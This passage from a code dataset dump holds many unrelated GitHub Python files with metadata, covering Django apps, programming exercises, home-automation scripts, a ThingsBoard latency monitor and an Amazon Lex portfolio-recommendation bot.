include('rest_framework.urls')),\n]\n","repo_name":"Guilherme2020/web-api-drf-03","sub_path":"feedit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"4241226765","text":"import board\nimport json\n\ncb = board.create_board()\nwith open(\"default.json\") as pos:\n positions = json.loads(pos.read())\nvalue = board.fill_board(cb, positions)\n\ngs = cb\n\nc_castle = {'W':{'l':'','s':''},'B':{'l':'','s':''}}\n# w_castle = {'l':'','s':''} value of long and short castle can be 'm' for moved or empty\n# when you move the rook with 0 x coord long castle's value will be 'm',\n# when you move the rook with 7 x coord short castle's vlaue will be 'm'\n# and when you move the king both of the values will be 'm' ","repo_name":"Aayush4527f/chess_py","sub_path":"gs.py","file_name":"gs.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} 
+{"seq_id":"32202897232","text":"\nfrom collections import Counter\nfrom timeit import default_timer as timer\n\n\"\"\"\nInput handling, take in and sort\n\n\"\"\"\n\ndef sortTimestamps(eventList):\n eventList.sort(key = lambda x: x.split(\"]\")[0])\n return eventList\n\ndef getInput(inputFile):\n allEvents = list()\n for line in open(inputFile):\n allEvents.append(line)\n return sortTimestamps(allEvents)\n\nclass Factory:\n\n def __init__(self):\n self.guards = dict()\n\n def getGuards(self):\n return self.guards\n\n def addGuard(self,ID):\n self.guards[ID] = Guard(ID)\n\n def getGuard(self,ID):\n return self.guards[ID]\n\n\n #for ID of most sleepy guard\n def mostSleep(self):\n mostSleep = (0,0)\n for guard in self.getGuards():\n amountOfSleep = self.guards[guard].fetchSleep()\n if amountOfSleep > mostSleep[1]:\n mostSleep = (guard, self.guards[guard].fetchSleep())\n return mostSleep[0]\n\n def hasGuard(self,ID):\n if ID in self.guards:\n return True\n else:\n return False\n\n\nclass Guard:\n\n def __init__(self,ID):\n self.ID = ID\n self.totalSleep = 0\n self.sleepTimes = list()\n\n def addSleep(self,amount):\n self.totalSleep += amount\n\n def fetchSleep(self):\n return self.totalSleep\n\n def getID(self):\n return self.ID\n\n def fallAsleep(self,minute):\n self.lastTimeOfSleep = minute\n\n def wakeUp(self,minute):\n self.lastTimeOfWake = minute\n self.addSleep(self.lastTimeOfWake-self.lastTimeOfSleep)\n for time in range (self.lastTimeOfSleep,self.lastTimeOfWake):\n self.sleepTimes.append(time)\n\n def mostFrequentMinute(self):\n cnt = Counter(self.sleepTimes)\n return cnt.most_common(1)\n\ndef newShiftID(line):\n splitLine = line.split(\" \")\n if splitLine[2] == \"Guard\":\n ID = splitLine[3][1:]\n return ID\n else:\n return None\n\ndef sleepEvent(line):\n if line.split(\" \")[2] == \"falls\":\n return True\n else:\n return False\n\ndef wakeEvent(line):\n if line.split(\" \")[2] == \"wakes\":\n return True\n else:\n return False\n\ndef getTime(line):\n 
return int(line.split(\" \")[1][:5].split(\":\")[1])\n\n\n#PART 1\nstart = timer()\neventList = getInput(\"input.txt\")\nfactory = Factory()\ncurrentID = None\nfor line in eventList:\n newGuardID = newShiftID(line)\n if newGuardID != None and not factory.hasGuard(newGuardID):\n #print(\"new guard begins shift!\",newGuardID)\n currentID = newGuardID\n factory.addGuard(newGuardID)\n elif newGuardID != None and factory.hasGuard(newGuardID):\n currentID = newGuardID\n elif sleepEvent(line):\n #print(\"fell asleep!\")\n time = getTime(line)\n factory.getGuard(currentID).fallAsleep(time)\n elif wakeEvent(line):\n #print(\"woke up!\")\n time = getTime(line)\n factory.getGuard(currentID).wakeUp(time)\n\n\nprint(\"---------PART 1 RESULTS----------\")\nmostSleepyGuard = factory.getGuard(factory.mostSleep())\nmostFreqMinute = mostSleepyGuard.mostFrequentMinute()[0][0]\namount = mostSleepyGuard.fetchSleep()\nprint(\"Guard\", factory.mostSleep(),\"slept the most, with a total of\", amount, \"minutes, and spends most time asleep on 00:\" + str(mostFreqMinute))\nprint(\"---------------------------------\")\n\n#PART 2\nmostSleepOnSameMinute = (0,0)\nmostSleepyGuard = 0\nfor guard in factory.getGuards():\n mostFreq = factory.getGuard(guard).mostFrequentMinute()\n if mostFreq == []:\n continue\n sleepsOn = mostFreq[0][0]\n amount = mostFreq[0][1]\n\n if amount > mostSleepOnSameMinute[1]:\n mostSleepOnSameMinute = (sleepsOn,amount)\n mostSleepyGuard = guard\n\nprint(\"--------PART 2 RESULTS----------\")\nprint(\"Guard\",mostSleepyGuard,\"slept on\",mostSleepOnSameMinute[0], mostSleepOnSameMinute[1], \"times\")\nprint(\"--------------------------------\")\nend = timer()\nprint(\"computation time:\",end-start)\n","repo_name":"hnytun/advent-of-code","sub_path":"december-4/sleepyGuards.py","file_name":"sleepyGuards.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} 
+{"seq_id":"40459741937","text":"n = int(input())\n\n\nfor i in range(n):\n m = int(input())\n r = int(input())\n\n g = [[] for _ in range(m)]\n for _ in range(r):\n x, y = map(int, input().split())\n g[x].append(y)\n g[y].append(x)\n \n vis = [False]*m\n def dfs(x):\n vis[x] = True\n for adj in g[x]:\n if not vis[adj]:\n dfs(adj)\n \n ans = -1\n for i in range(m):\n if not vis[i]:\n dfs(i)\n ans += 1\n print(ans)","repo_name":"allEyezOnCode/algo-training","sub_path":"kattis/reachableroads.py","file_name":"reachableroads.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28377469748","text":"data = open('matrix.txt', 'r')\nresult = []\nfor i in data:\n result.append(list(map(int,i.rstrip().split(','))))\nprint(result)\n\nroute_list = {}\nfor i1,v1 in enumerate(result):\n for i2,v2 in enumerate(v1):\n if i1 !=79 and i2!=79:\n route_list[v2]= [result[i1+1][i2],result[i1][i2+1]]\n elif i1 ==79 and i2!=79:\n route_list[v2] = [result[i1][i2 + 1]]\n elif i1 !=79 and i2==79:\n route_list[v2] = [result[i1+1][i2]]\n\ncnt=0\ndef Jot(x_cor,y_cor,sum,cnt):\n if x_cor==79 and y_cor==79:\n return sum\n elif x_cor==79 and y_cor!=79:\n sum+=result[x_cor][y_cor+1]\n return Jot(x_cor,y_cor+1,sum,cnt)\n elif x_cor!=79 and y_cor==79:\n sum+=result[x_cor+1][y_cor]\n return Jot(x_cor+1,y_cor,sum,cnt)\n else:\n sum1 = sum+result[x_cor+1][y_cor]\n sum2 = sum+result[x_cor][y_cor+1]\n return min(Jot(x_cor+1,y_cor,sum1,cnt),Jot(x_cor,y_cor+1,sum2,cnt))\n\nprint(Jot(0,0,0,cnt))","repo_name":"smy37/Project-Euler","sub_path":"problem81.py","file_name":"problem81.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"19863092421","text":"from __future__ import absolute_import, annotations\n\nimport os.path\nimport subprocess\nfrom typing import Dict, List\n\nfrom univention.config_registry 
import ConfigRegistry, handler_set, handler_unset\n\nimport listener\n\n\ndescription = 'Manage ucs/server/saml-idp-server/* variables'\nfilter = '(|(objectClass=univentionDomainController)(objectClass=univentionMemberServer))'\nattributes = ['univentionService']\n\n\ndef handler(dn: str, new: Dict[str, List[bytes]], old: Dict[str, List[bytes]]) -> None:\n ucr = ConfigRegistry()\n ucr.load()\n listener.setuid(0)\n try:\n try:\n fqdn = '%s.%s' % (new['cn'][0].decode('UTF-8'), new['associatedDomain'][0].decode('ASCII'))\n except (KeyError, IndexError):\n return\n\n change = False\n if b'univention-saml' in new.get('univentionService', []):\n handler_set(['ucs/server/saml-idp-server/%s=%s' % (fqdn, fqdn)])\n change = True\n elif b'univention-saml' in old.get('univentionService', []):\n handler_unset(['ucs/server/saml-idp-server/%s' % (fqdn,)])\n change = True\n\n if change:\n path_to_cert = ucr.get('saml/idp/certificate/certificate')\n path_to_key = ucr.get('saml/idp/certificate/privatekey')\n if path_to_cert and os.path.exists(path_to_cert) and path_to_key and os.path.exists(path_to_key):\n subprocess.call(['systemctl', 'restart', 'univention-saml'])\n finally:\n listener.unsetuid()\n","repo_name":"univention/univention-corporate-server","sub_path":"saml/univention-saml/listener/univention-saml-servers.py","file_name":"univention-saml-servers.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"33"} +{"seq_id":"14389927051","text":"from cffi import FFI\nffi = FFI()\nffi.cdef(open('cffi-ecere.h').read()) \nffi.set_source(\"_pyecere\",\n '#include \"ecere.h\"',\n sources = [ \"../c/eC.c\", \"../c/ecere.c\" ],\n include_dirs = [\"../c\"],\n libraries = [\"ecere\"],\n library_dirs = [\"C:/Program Files/Ecere SDK/bin\"])\nif __name__ == \"__main__\":\n 
ffi.compile(verbose=True)\n","repo_name":"redj/prototype-bindings-ecere-sdk","sub_path":"py/build_ecere.py","file_name":"build_ecere.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"71445751773","text":"# El usuario ingresa el primer número\r\nnumero1 = int(input(\"Por favor ingrese un numero: \"))\r\n# El usuario ingresa el segundo número\r\nnumero2 = int(input(\"Por favor ingrese un numero: \"))\r\n\r\n# Define una función llamada 'espejo' que toma dos argumentos: n y m\r\ndef espejo(k,x): \r\n # Asigna el valor de 'numero1' a la variable 'k'\r\n k = numero1\r\n # Inicializa una cadena vacía llamada 'espejo'\r\n espejo = \"\"\r\n # Ejecuta el bucle mientras 'k' sea mayor que 0\r\n while(k>0):\r\n # Obtiene el último dígito de 'k' y lo asigna a la variable 'dig'\r\n dig = k%10\r\n # Elimina el último dígito de 'k' y lo asigna a la variable 'sig'\r\n sig = k//10\r\n # Convierte el dígito obtenido en cadena y lo asigna a la variable 'x'\r\n x = str(dig)\r\n # Agrega el dígito como cadena al final de la cadena 'espejo'\r\n espejo+=x\r\n # Actualiza el valor de 'k' con el valor de 'sig'\r\n k = sig\r\n # Compara si la cadena 'espejo' es igual a la representación en cadena de 'numero2'\r\n if(espejo == str(numero2)):\r\n # Si son iguales, imprime que los números son espejo entre sí\r\n print(f\"El número {numero1} y el número {numero2} son números espejo entre sí\")\r\n else:\r\n # Si no son iguales, imprime que los números no son espejo entre sí\r\n print(f\"El número {numero1} y el número {numero2} no son números espejo entre sí\")\r\n\r\n# Llama a la función 'espejo' con los valores de 'numero1' y 'numero2'\r\nespejo(numero1,numero2)\r\n","repo_name":"MAFED05/Taller-2","sub_path":"punto3.py","file_name":"punto3.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} 
+{"seq_id":"2569658082","text":"import zipfile\r\nfrom celery import shared_task\r\nfrom django.core.files.base import ContentFile\r\nfrom dataset.models import DatasetFile, ProcessedDataset, AnnotationFile\r\n\r\n\r\ndef create_subsets(lst, proportions):\r\n if len(proportions) != 2:\r\n return None\r\n\r\n total_proportions = round(sum(proportions), 2)\r\n if total_proportions != 1:\r\n return None\r\n\r\n total_elements = len(lst)\r\n num_of_subsets = len(proportions)\r\n num_elements_per_part = [int(p * total_elements / total_proportions) for p in proportions]\r\n\r\n remaining_elements = total_elements - sum(num_elements_per_part)\r\n for i in range(remaining_elements):\r\n num_elements_per_part[i % num_of_subsets] += 1\r\n\r\n subsets = []\r\n start = 0\r\n for num_elements in num_elements_per_part:\r\n end = start + num_elements\r\n subsets.append(lst[start:end])\r\n start = end\r\n\r\n return subsets\r\n\r\n@shared_task\r\ndef preprocess_zip_file(files, proportions, data_folders, raw_dataset):\r\n\r\n processedDatasets = []\r\n parent_folder_name = raw_dataset.parent_folder.folder_name\r\n \r\n imagesSubFolders = data_folders[0].folders.all().order_by('folder_name')\r\n labelsSubFolders = data_folders[1].folders.all().order_by('folder_name')\r\n\r\n with zipfile.ZipFile(files[0], 'r') as z:\r\n\r\n subsets = create_subsets(z.namelist(), proportions)\r\n for i, subset in enumerate(subsets):\r\n datasetFileInstances = []\r\n processedDataset = ProcessedDataset(\r\n name=parent_folder_name + \" \" + imagesSubFolders[i].folder_name,\r\n subset=imagesSubFolders[i].folder_name,\r\n sample_counts=len(subset),\r\n raw_dataset=raw_dataset\r\n )\r\n processedDataset.save()\r\n processedDatasets.append(processedDataset)\r\n for name in subset:\r\n content = z.read(name)\r\n content_file = ContentFile(content, name=name)\r\n \r\n datasetFile = DatasetFile(\r\n processed_dataset=processedDataset,\r\n file_name=name,\r\n file_extension=name.split('.')[-1],\r\n 
file_path=imagesSubFolders[i].folder_path + \"/\" + name,\r\n file_size=content_file.size,\r\n file_upload=content_file,\r\n parent=imagesSubFolders[i]\r\n )\r\n datasetFileInstances.append(datasetFile)\r\n\r\n DatasetFile.objects.bulk_create(datasetFileInstances)\r\n\r\n\r\n with zipfile.ZipFile(files[1], 'r') as z:\r\n\r\n subsets = create_subsets(z.namelist(), proportions)\r\n for i, subset in enumerate(subsets):\r\n annotationFileInstances = []\r\n for name in subset:\r\n content = z.read(name)\r\n content_file = ContentFile(content, name=name)\r\n \r\n annotationFile = AnnotationFile(\r\n processed_dataset=processedDatasets[i],\r\n file_name=name,\r\n file_extension=name.split('.')[-1],\r\n file_path=labelsSubFolders[i].folder_path + \"/\" + name,\r\n file_size=content_file.size,\r\n file_upload=content_file,\r\n parent=labelsSubFolders[i]\r\n )\r\n annotationFileInstances.append(annotationFile)\r\n\r\n AnnotationFile.objects.bulk_create(annotationFileInstances)\r\n\r\n","repo_name":"snowdenHM/aiEngine","sub_path":"dataset/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"36379539085","text":"# Notify upon problems with plants\n\nimport appdaemon.plugins.hass.hassapi as hass\nimport datetime\nimport time\n\n\nclass Test(hass.Hass):\n\n def initialize(self):\n\n self.listen_event(self.receive_telegram_callback, 'telegram_callback')\n\n def receive_telegram_callback(self, event_id, payload_event, *args):\n\n data_callback = payload_event['data']\n callback_id = payload_event['id']\n message_id = payload_event['message_id']\n chat_id = payload_event['user_id']\n\n self.log(payload_event)\n\n if payload_event['data'] == '/removekeyboard':\n\n self.call_service(\n 'telegram_bot/answer_callback_query',\n message='OK',\n callback_query_id=callback_id\n )\n\n self.call_service(\n 'telegram_bot.edit_replymarkup',\n 
message_id=message_id,\n chat_id=user_id,\n inline_keyboard=[]\n )\n","repo_name":"deeenclave/Home_Assistant","sub_path":"appdaemon/apps/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"27384378240","text":"import time\nimport os\nfrom queue import Queue\nfrom typing import Dict, Tuple\nimport threading\nimport json\n\nimport websocket\nimport requests\n\nfrom subscribe import Subscribe\nfrom utils import logger\nfrom influx_worker import WsInfluxWorker\n\nTHINGSBOARD_URL = os.getenv('THINGSBOARD_URL', 'http://localhost/api')\nTHINGSBOARD_URL_WS = os.getenv('THINGSBOARD_URL_WS', 'wss://localhost')\nTHINGSBOARD_ACCOUNT = os.getenv('THINGSBOARD_ACCOUNT', '')\nTHINGSBOARD_PASSWORD = os.getenv('THINGSBOARD_PASSWORD', '')\nGAP = 1 * 1000\nGAP_LAST = 2 * 1000\n\n\nclass TBWSClient(websocket.WebSocketApp):\n WS_REQ_NEW_CONNECT = 'ws_req_newconnect'\n\n def __init__(self, url, q_req_new_ws=Queue()):\n super().__init__(url,\n on_open=self.ws_on_open,\n on_close=self.ws_on_close,\n on_error=self.ws_on_error,\n on_message=self.ws_on_message,\n on_ping=self.on_ping,\n on_pong=self.on_pong,\n )\n '''\n ref:\n 1. https://websocket-client.readthedocs.io/en/latest/examples.html\n 2. https://github.com/websocket-client/websocket-client/blob/master/websocket/_app.py\n '''\n self.ws_subid = 0\n self.ws_subid_mapping = {}\n self.q_req_new_ws = q_req_new_ws\n self.count = 0\n self.init = False\n self.last_ts = {} # example{'sub_id1': time.time(), 'sub_id2': time.time()}\n\n def on_ping(self, ws, message):\n logger.debug(\"Got a ping! A pong reply has already been automatically sent.\")\n\n def on_pong(self, ws, message):\n logger.debug(\"Got a pong! 
No need to respond\")\n\n def _submit_req_new_ws(self):\n # submit to this thread owner for a new websocket client request\n # in case of token invaid, other reason\n self.q_req_new_ws.put(TBWSClient.WS_REQ_NEW_CONNECT)\n\n def ws_on_error(self, ws, error=Exception('')):\n logger.info(f'websocket error {str(error)}')\n self._submit_req_new_ws()\n\n def ws_on_close(self, ws, close_status_code=0, close_msg=''):\n logger.info('websocket connection closed')\n self._submit_req_new_ws()\n\n def ws_on_open(self, ws):\n topic = Subscribe.load_tb_ws_topic()\n logger.info('websocket connection opened')\n logger.debug(f'subscribe topic: {topic}')\n # ws.send(\"This is a ping\", websocket.ABNF.OPCODE_PING)\n ws.send(topic)\n\n def ws_on_message(self, ws, message=''):\n '''\n # telemetry sample\n {\n \"subscriptionId\":1,\n \"errorCode\":0,\n \"errorMsg\":null,\n \"data\":{\n \"batteryLevel\":[[1652170331846,\"80\"]],\n \"leakage\":[[1652170331846,\"true\"]],\n \"pulseCounter\":[[1652170331846,\"3106310\"]]\n },\n \"latestValues\":{\n \"pulseCounter\":1652170331846,\n \"leakage\":1652170331846,\n \"batteryLevel\":1652170331846\n }\n }\n '''\n ts_received = time.time() * 1000\n data = json.loads(message)\n sub_id = int(data['subscriptionId'])\n # filter by subscribe key\n (is_existed, device_id) = subscribe.check_if_subscribe_by_sub_id(sub_id)\n if is_existed is True:\n # filter and put data to worker\n worker_ws.enqueue(device_id, data, ts_received)\n # TODO log\n\n\nclass TBRestClient():\n def __init__(self, username='', password=''):\n self.username = username\n self.password = password\n self.tb_token = ''\n message, status_code = self.login()\n assert message == ''\n assert status_code == 200\n self.ws = None\n self.thread_ws = None\n\n self.q_req_new_ws = Queue()\n self.q_req_new_ws.put(TBWSClient.WS_REQ_NEW_CONNECT)\n self.t_ws_manager = threading.Thread(target=self.ws_thread_manager,\n daemon=True)\n self.t_ws_manager.start()\n\n def ws_thread_manager(self):\n q_interval 
= 60\n while True:\n data = self.q_req_new_ws.get()\n # receive request from ws client child, to perform single ws instance\n if data == TBWSClient.WS_REQ_NEW_CONNECT:\n if isinstance(self.ws, websocket.WebSocketApp) is True:\n self.ws.close()\n if isinstance(self.thread_ws, threading.Thread) is True:\n self.thread_ws.join()\n self.thread_ws = threading.Thread(target=self.start_ws, daemon=True)\n self.thread_ws.start()\n time.sleep(q_interval)\n\n def start_ws(self):\n message, status_code = self.login()\n assert message == ''\n assert status_code == 200\n url = f'{THINGSBOARD_URL_WS}/api/ws/plugins/telemetry?token={self.tb_token}'\n self.ws = TBWSClient(url, self.q_req_new_ws)\n self.ws.run_forever()\n\n def get_auth_headers(self) -> Dict:\n return {\n 'Accept': 'application/json',\n 'Accept-Encoding': 'gzip, deflate',\n 'X-Authorization': f'Bearer {self.tb_token}'\n }\n\n def login(self) -> Tuple[str, int]:\n # login to IOT Hub\n data = {\n 'username': self.username,\n 'password': self.password\n }\n message, status_code = '', 200\n r = requests.post(f'{THINGSBOARD_URL}/auth/login', json=data)\n status_code = r.status_code\n if status_code == 200:\n self.tb_token = r.json()['token']\n else:\n message = r.json()['message']\n return message, status_code\n return message, status_code\n\n\ndef start(tb_client):\n message, status_code = tb_client.login()\n assert message == ''\n assert status_code == 200\n while True:\n time.sleep(60)\n\n\nsubscribe = Subscribe()\nworker_ws = WsInfluxWorker(subscribe)\nworker_ws.start()\n\nif __name__ == '__main__':\n tb_client = TBRestClient(THINGSBOARD_ACCOUNT,\n THINGSBOARD_PASSWORD)\n start(tb_client)\n","repo_name":"chienfuchen32/thingsboard-latency-monitor","sub_path":"ws_ts_latency_monitor.py","file_name":"ws_ts_latency_monitor.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"788676417","text":"# Problem Statement: 
https://practice.geeksforgeeks.org/problems/make-matrix-beautiful-1587115620/1\n\n#User function Template for python3\n\nclass Solution:\n def findMinOpeartion(self, matrix, n):\n # Code here\n max_v = 0\n row = 0\n cur_s = 0\n for i in matrix:\n row += 1\n s = sum(i)\n max_v = max(s,max_v)\n cur_s += s\n for j in range(n):\n s = 0\n for i in range(n):\n s += matrix[i][j]\n max_v = max(s,max_v)\n ans = max_v*row - cur_s\n return ans\n\n\n#{ \n # Driver Code Starts\n\n#Initial Template for Python 3\n\nfor _ in range(int(input())):\n n = int(input())\n matrix = [list(map(int,input().split())) for _ in range(n)]\n ob = Solution()\n print(ob.findMinOpeartion(matrix, n))\n# } Driver Code Ends","repo_name":"yashitanamdeo/geeks-for-geeks","sub_path":"Medium/make_matrix_beautiful.py","file_name":"make_matrix_beautiful.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"33"} +{"seq_id":"8832814757","text":"#!/usr/bin/python\n#! 
-*-coding:utf-8 -*-\n\n'''\nclass MyProject:\n\tname = 'Pratice'\n\n\tdef forPratice(self):\n\t\tprint '%s,just for fun!'%self.name\n\nt = MyProject()\nprint t.name\nt.forPratice()\n'''\n\nclass Viehle:\n\tdef __init__(self,speed):\n\t\tself.speed =speed\n\n\tdef drive(self,distance):\n\t\ttime = distance/self.speed\n\t\tprint (\"速度为%.2f\"%time)\n\nclass Bike(Viehle):\n\tpass\n\nclass Car(Viehle):\n\tdef __init__(self,speed,flue):\n\t\tViehle.__init__(self,speed)\n\t\tself.flue = flue\n\n\tdef drive(self,distance):\n\t\tViehle.drive(self,distance)\n\t\ttotal = distance*self.flue\n\t\tprint (\"燃油量为%.2f\"%total)\n\nm = Bike(15)\nn = Car(100,0.01)\nm.drive(200)\nn.drive(200)\n\n","repo_name":"Vicky-hyq/pratice","sub_path":"pratice/face_to_project/pratice.py","file_name":"pratice.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"7198058722","text":"# 各桁の和を求める\ndef calc_sum_degits(n):\n sum_degit = 0\n while n > 0:\n sum_degit += n % 10\n n //= 10\n return sum_degit\n\nn, a, b = map(int, input().split())\n\nresult = 0\n\nfor i in range(1, n+1):\n if a <= calc_sum_degits(i) <= b:\n result += i\n\nprint(result)","repo_name":"o8n/competitive_programming","sub_path":"abc/83/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"24142745229","text":"from shutil import copyfile\nfrom pathlib import Path\nimport json\n\nMETA_FILE_NAME = \"metadata.json\"\nOUTPUT_FOLDER = \"./output-no-aug/\"\n\n\ndef read_json(path):\n with open(path) as f:\n return json.load(f)\n\n\ndef write_json(path, data):\n with open(path, 'w') as f:\n json.dump(data, f)\n\n\ndef get_input_path(index):\n return f\"input_{index}/\"\n\n\nNUM_OF_INPUTS = 4\n\n'''\n{\n categories: [\n {\n id: number,\n name: string,\n supercategory: string,\n }\n ],\n images: [\n {\n id: number,\n 
file_name: string,\n width: number,\n height: number,\n }\n ],\n annotations: [\n {\n id: number,\n image_id: number,\n category_id: number,\n bbox: [x, y, width, height],\n area: number,\n segmentation: [\n [x, y, x, y, x, y, x, y, ...],\n [x, y, x, y, x, y, x, y, ...],\n [x, y, x, y, x, y, x, y, ...],\n ],\n iscrowd: 0 or 1,\n }\n ]\n}\n'''\n\n# Prepare output\nPath(OUTPUT_FOLDER).mkdir(parents=True, exist_ok=True)\n\n# Read metadata\nmeta_data = read_json(f\"{get_input_path(0)}{META_FILE_NAME}\")\n\ncounter = 0\nfor img in meta_data[\"images\"]:\n img_name = img[\"file_name\"]\n try:\n src = f\"{get_input_path(0)}{img_name}\"\n dst = f\"{OUTPUT_FOLDER}{img_name}\"\n copyfile(src, dst)\n counter += 1\n except Exception as e:\n print(img_name)\n\ncur_img_index = counter\n\n# Combine, move forward with image_id\nfor i in range(0, NUM_OF_INPUTS):\n image_names = []\n\n input_meta_data = read_json(f\"{get_input_path(i)}{META_FILE_NAME}\")\n for img in input_meta_data[\"images\"]:\n img[\"id\"] += cur_img_index\n meta_data[\"images\"].append(img)\n image_names.append(img[\"file_name\"])\n\n for ann in input_meta_data[\"annotations\"]:\n ann[\"image_id\"] += cur_img_index\n meta_data[\"annotations\"].append(ann)\n\n for cat in input_meta_data[\"categories\"]:\n cat[\"id\"] += cur_img_index\n meta_data[\"categories\"].append(cat)\n\n cur_img_index += len(input_meta_data[\"images\"])\n\n for img_name in image_names:\n src = f\"{get_input_path(i)}{img_name}\"\n dst = f\"{OUTPUT_FOLDER}{img_name}\"\n copyfile(src, dst)\n\nprint(f\"Total images {cur_img_index}\")\nwrite_json(f\"{OUTPUT_FOLDER}{META_FILE_NAME}\", meta_data)\n","repo_name":"ptmdmusique/manicure-combine-coco","sub_path":"combine-coco.py","file_name":"combine-coco.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"27028975436","text":"### Required Libraries ###\nfrom datetime import datetime\nfrom 
dateutil.relativedelta import relativedelta\n\n\n### Functionality Helper Functions ###\n\ndef parse_int(n):\n \"\"\"Securely converts a non-integer value to integer.\"\"\"\n try:\n return int(n)\n except ValueError:\n return float(\"nan\")\n\ndef build_validation_result(is_valid, violated_slot, message_content):\n \"\"\"Define a result message structured as Lex response.\"\"\"\n if message_content is None:\n return {\"isValid\": is_valid, \"violatedSlot\": violated_slot}\n return {\n \"isValid\": is_valid,\n \"violatedSlot\": violated_slot,\n \"message\": {\"contentType\": \"PlainText\", \"content\": message_content},\n }\n\n\n### Dialog Actions Helper Functions ###\n\ndef get_slots(intent_request):\n \"\"\"Fetch all the slots and their values from the current intent.\"\"\"\n return intent_request[\"currentIntent\"][\"slots\"]\n\ndef elicit_slot(session_attributes, intent_name, slots, slot_to_elicit, message):\n \"\"\"Defines an elicit slot type response.\"\"\"\n return {\"sessionAttributes\":session_attributes,\"dialogAction\":{\"type\":\"ElicitSlot\",\"intentName\":intent_name,\"slots\":slots,\"slotToElicit\":slot_to_elicit,\"message\":message},\n }\n \n# Define delegate slot type response:\ndef delegate(session_attributes, slots):\n return {\"sessionAttributes\":session_attributes,\"dialogAction\":{\"type\":\"Delegate\",\"slots\":slots}}\n\ndef close(session_attributes, fulfillment_state, message):\n \"\"\"Defines a close slot type response.\"\"\"\n response = {\n \"sessionAttributes\":session_attributes,\n \"dialogAction\": {\n \"type\":\"Close\",\n \"fulfillmentState\":fulfillment_state,\n \"message\":message,\n },\n }\n return response\n\n### Intent Handler ###\n\ndef recommend_portfolio(intent_request):\n first_name = get_slots(intent_request)[\"firstName\"]\n age = get_slots(intent_request)[\"age\"]\n investment_amount = get_slots(intent_request)[\"investmentAmount\"]\n risk_level = get_slots(intent_request)[\"riskLevel\"]\n source = 
intent_request[\"invocationSource\"]\n output_session_attributes = intent_request[\"sessionAttributes\"]\n \n \"\"\"Performs dialog management and fulfillment for recommending a portfolio.\"\"\"\n if source == \"DialogCodeHook\":\n if not first_name:\n return elicit_slot(\n output_session_attributes,\n intent_request['currentIntent']['name'],\n intent_request['currentIntent']['slots'],\n 'firstName',\n {'contentType':'PlainText', 'content': 'Thank you for trusting me to help, can you please provide your name?'},\n )\n if first_name and not age:\n return elicit_slot(\n output_session_attributes,\n intent_request['currentIntent']['name'],\n intent_request['currentIntent']['slots'],\n 'age',\n {'contentType':'PlainText','content':'How old are you?'},\n )\n if (first_name and age) and (parse_int(age) <= 0) and not investment_amount:\n return elicit_slot(\n intent_request[\"sessionAttributes\"],\n intent_request['currentIntent']['name'],\n intent_request['currentIntent']['slots'],\n 'age',\n {'contentType':'PlainText','content':\"Age must be greater than 0; let's try that again. How old are you?\"},\n )\n if (first_name and age) and (parse_int(age) >= 65) and not investment_amount:\n return elicit_slot(\n intent_request[\"sessionAttributes\"],\n intent_request['currentIntent']['name'],\n intent_request['currentIntent']['slots'],\n 'age',\n {'contentType':'PlainText','content':'Sorry, the maximum age to use this service is 64. 
Please provide an age between 1 and 64.'},\n )\n if first_name and age and not investment_amount:\n return elicit_slot(\n output_session_attributes,\n intent_request['currentIntent']['name'],\n intent_request['currentIntent']['slots'],\n 'investmentAmount',\n {'contentType':'PlainText','content':'How much do you want to invest?'},\n )\n if (first_name and age) and (parse_int(investment_amount) < 5000):\n return elicit_slot(\n output_session_attributes,\n intent_request['currentIntent']['name'],\n intent_request['currentIntent']['slots'],\n 'investmentAmount',\n {'contentType':'PlainText','content':'The minimum investment amount is $5,000 USD; please provide a greater amount to use our service.'},\n )\n return delegate(output_session_attributes, get_slots(intent_request))\n \n if risk_level:\n if risk_level == 'None':\n initial_recommendation = \"100% bonds (AGG), 0% equities (SPY)\"\n elif risk_level == 'Very Low':\n initial_recommendation = \"80% bonds (AGG), 20% equities (SPY)\"\n elif risk_level == 'Low':\n initial_recommendation = \"60% bonds (AGG), 40% equities (SPY)\"\n elif risk_level == 'Medium':\n initial_recommendation = \"40% bonds (AGG), 60% equities (SPY)\"\n elif risk_level == 'High':\n initial_recommendation = \"20% bonds (AGG), 80% equities (SPY)\"\n elif risk_level == 'Very High':\n initial_recommendation = \"0% bonds (AGG), 100% equities (SPY)\"\n\n # Return a message with the initial recommendation based on the risk level:\n return close(\n intent_request[\"sessionAttributes\"],\n \"Fulfilled\",\n {\n \"contentType\": \"PlainText\",\n \"content\": \"\"\"{} thank 